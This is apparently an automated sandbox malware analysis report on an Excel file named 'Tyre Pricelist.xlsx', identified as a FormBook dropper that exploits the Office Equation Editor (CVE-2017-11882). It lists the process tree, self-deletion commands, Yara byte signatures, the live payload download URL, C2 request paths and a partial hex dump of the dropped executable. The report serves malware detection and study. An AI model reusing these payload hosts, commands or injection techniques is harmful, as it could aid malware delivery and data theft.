Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Tyre Pricelist.xlsx

Overview

General Information

Sample Name:Tyre Pricelist.xlsx
Analysis ID:321115
MD5:3b5f7a2a0429e796040aa5bc3763a8fe
SHA1:c049ac5a44d034995a55bd5f49aece9631c69c1f
SHA256:9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2816 cmdline: 'C:\Users\Public\vbc.exe' MD5: 429BBA6DBE159C300679509BE3085665)
      • RegAsm.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2832 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2220 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cmd.exe (PID: 2468 cmdline: 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • choice.exe (PID: 2368 cmdline: choice /C Y /N /D Y /T 3 MD5: 11DDFBF834BB2C6F4D23297D80EE9E45)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xa3a98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa3d02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xaf825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xaf311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xaf927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xafa9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa471a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xae58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa5413:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xb54c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb64ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.510000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.510000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.510000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.510000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.510000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeAvira: detection malicious, Label: TR/AD.Swotter.sxyuz
          Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: TR/AD.Swotter.sxyuz
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Tyre Pricelist.xlsxVirustotal: Detection: 27%Perma Link
          Source: Tyre Pricelist.xlsxReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 4.2.vbc.exe.510000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.RegAsm.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop esi6_2_00417295
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop esi6_2_004172A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi11_2_00097295
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi11_2_000972A5
          Source: global trafficDNS query: name: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:23:44 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 21:43:46 GMTETag: "92600-5b47c9f64afa6"Accept-Ranges: bytesContent-Length: 599552Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 e7 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 09 00 00 06 00 00 00 00 00 00 de 3d 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 55 96 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 3d 09 00 4f 00 00 00 00 40 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 1d 09 00 00 20 00 00 00 1e 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 09 00 00 04 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 88 9d 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 98 2b 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 3f 00 00 70 80 04 00 00 0
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1Host: www.pestigenix.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1Host: www.atlanticdentallab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinethdysanotherrainbowlomoyentthghf.ydns.euConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to behavior
          Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: workfinethdysanotherrainbowlomoyentthghf.ydns.euConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1Host: www.pestigenix.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1Host: www.atlanticdentallab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
